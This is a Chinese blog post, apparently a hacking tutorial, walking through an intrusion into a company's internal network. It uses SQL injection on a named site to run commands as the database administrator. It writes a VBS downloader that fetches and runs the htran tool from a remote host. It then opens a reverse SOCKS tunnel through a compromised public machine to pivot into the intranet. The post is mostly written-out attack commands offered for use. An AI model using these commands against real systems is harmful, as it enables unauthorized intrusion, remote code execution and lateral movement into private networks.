渗透内网方法之巧用代理

代理在入侵里的作用—–妙用代理,渗透内网

  一、踩点

  主机: http://www.webshell.cc

  OS:Windows 2000 + IIS 5.0 + MSSQL

  端口:80 21i

  数据库放内网,IP为 192.168.1.2 ,更重要的是内网数据库可以上网.

  首页存在注入漏洞,sa登陆.

  注入点:

   http://www.webshell.cc/list.asp?id=1

  二、入侵思路

  1.给内网目标机装个代理服务器

  2.把弄好的那个代理端口映到公网.

  3.本机用sockscap连接公网映的那个端口,这样,自己也就进到了内网。

  4.接下来就是找共享,嗅探,社会工程学等等了。

  三、入侵准备

  1.公网肉鸡一只:218.3.1.1

  2.工具:htran2.4,SocksCap,扫描器一份,NBSI 2.0一份。

  3.A表示数据库主机,B表示公网肉鸡 C表示网站放Web的地方 D表示本机(也在内网) www.webshell.cc

  4.A:192.168.1.2 B:218.3.1.1 C:www.webshell.cc D:192.168.0.25

  四、入侵进行时

  1.工具上传:

  在nbsi下执行:

  echo Set x= CreateObject(^”Microsoft.XMLHTTP^”):x.Open ^”GET^”,LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^”ADODB.Stream^”):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >down.vbs

  然后下载工具:

  cscript down.vbs http://IP/htran.exe htran.exe 这个可以在网上找下

  2.安装Socks5服务

  在nbsi下执行:

  htran.exe -install //安装Socks5服务

  htran.exe -start //启动Socks5服务

  3.反弹进行时

  在B上运行: htran.exe -s -listen 520 5200 //监听端口

  在nbsi下执行:htran.exe -s -connect 218.3.1.1 520

  3.进入内网

  现在用SocksCap连接 218.3.1.1 的5200端口,就等于进入了他的内网。

  五、渗透内网

  接下来就可以扫描,嗅探,等等,也就是后话了。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值